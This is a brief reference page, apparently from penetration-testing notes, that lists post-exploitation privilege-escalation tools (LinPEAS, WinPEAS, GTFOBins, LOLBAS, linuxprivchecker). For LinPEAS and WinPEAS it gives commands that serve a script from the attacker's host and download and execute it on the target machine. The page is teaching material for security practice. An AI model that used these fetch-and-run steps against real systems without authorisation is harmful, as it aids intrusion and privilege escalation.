Tools and Utilities
Here we can find some tools and utilities commonly used for practices related to post-exploitation:
LinPEAS
Script that searches for possible paths to escalate privileges on Linux/Unix*/MacOS hosts
Commands
Installation
sudo apt install peass
Usage
#Host machine
linpeas
python3 -m http.server $port #Create server to send file
#Target machine
cd /tmp
wget http://$hostIP:$port/linpeas.sh
bash linpeas.sh
WinPEAS
Script that searches for possible paths to escalate privileges on Windows hosts
Commands
Usage
#Host machine
wget https://github.com/carlospolop/PEASS-ng/releases/download/refs%2Fpull%2F260%2Fmerge/winPEASx64.exe
python3 -m http.server $port #Create server to send file
#Target machine
wget http://$hostIP:$port/winPEASx64.exe
.\winPEASx64.exe
GTFOBins
List of Unix binaries used to bypass local security restrictions in misconfigured systems
LOLBAS
Contains scripts, binaries, and libraries for developing a Living Off the Land attack on Windows
linuxprivchecker
Enumerate basic system info and search for common privilege escalation vectors on Linux systems
Last updated